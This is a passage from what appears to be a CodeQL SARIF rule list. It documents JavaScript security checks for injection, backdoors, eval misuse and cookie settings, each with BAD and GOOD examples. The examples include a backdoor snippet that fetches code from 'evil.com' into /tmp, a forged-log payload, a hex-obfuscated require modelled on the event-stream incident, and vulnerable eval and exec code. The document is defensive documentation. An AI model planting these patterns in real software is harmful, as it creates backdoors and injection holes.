OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n", - "markdown" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-912", "external/cwe/cwe-434" ], - "description" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.", - "id" : "js/http-to-file-access", - "kind" : "path-problem", - "name" : "Network data written to file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/indirect-command-line-injection", - "name" : "js/indirect-command-line-injection", - "shortDescription" : { - "text" : "Indirect uncontrolled command line" - }, - "fullDescription" : { - "text" : "Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Forwarding command-line arguments to a child process\n executed within a shell may indirectly introduce\n command-line injection vulnerabilities.", - "id" : "js/indirect-command-line-injection", - "kind" : "path-problem", - "name" : "Indirect uncontrolled command line", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/log-injection", - "name" : "js/log-injection", - "shortDescription" : { - "text" : "Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", - "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/log-injection", - "kind" : "path-problem", - "name" : "Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/password-in-configuration-file", - "name" : "js/password-in-configuration-file", - "shortDescription" : { - "text" : "Password in configuration file" - }, - "fullDescription" : { - "text" : "Storing unencrypted passwords in configuration files is unsafe." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", - "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], - "description" : "Storing unencrypted passwords in configuration files is unsafe.", - "id" : "js/password-in-configuration-file", - "kind" : "problem", - "name" : "Password in configuration file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/empty-password-in-configuration-file", - "name" : "js/empty-password-in-configuration-file", - "shortDescription" : { - "text" : "Empty password in configuration file" - }, - "fullDescription" : { - "text" : "Failing to set a password reduces the security of your code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", - "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], - "description" : "Failing to set a password reduces the security of your code.", - "id" : "js/empty-password-in-configuration-file", - "kind" : "problem", - "name" : "Empty password in configuration file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/hardcoded-data-interpreted-as-code", - "name" : "js/hardcoded-data-interpreted-as-code", - "shortDescription" : { - "text" : "Hard-coded data interpreted as code" - }, - "fullDescription" : { - "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", - "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-506" ], - "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", - "id" : "js/hardcoded-data-interpreted-as-code", - "kind" : "path-problem", - "name" : "Hard-coded data interpreted as code", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/user-controlled-bypass", - "name" : "js/user-controlled-bypass", - "shortDescription" : { - "text" : "User-controlled bypass of security check" - }, - "fullDescription" : { - "text" : "Conditions that the user controls are not suited for making security-related decisions." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", - "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], - "description" : "Conditions that the user controls are not suited for making security-related decisions.", - "id" : "js/user-controlled-bypass", - "kind" : "path-problem", - "name" : "User-controlled bypass of security check", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-code-construction", - "name" : "js/unsafe-code-construction", - "shortDescription" : { - "text" : "Unsafe code constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", - "id" : "js/unsafe-code-construction", - "kind" : "path-problem", - "name" : "Unsafe code constructed from library input", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/samesite-none-cookie", - "name" : "js/samesite-none-cookie", - "shortDescription" : { - "text" : "Sensitive cookie without SameSite restrictions" - }, - "fullDescription" : { - "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request Forgery (CSRF) attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", - "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1275" ], - "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", - "id" : "js/samesite-none-cookie", - "kind" : "problem", - "name" : "Sensitive cookie without SameSite restrictions", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/file-system-race", - "name" : "js/file-system-race", - "shortDescription" : { - "text" : "Potential file system race condition" - }, - "fullDescription" : { - "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { 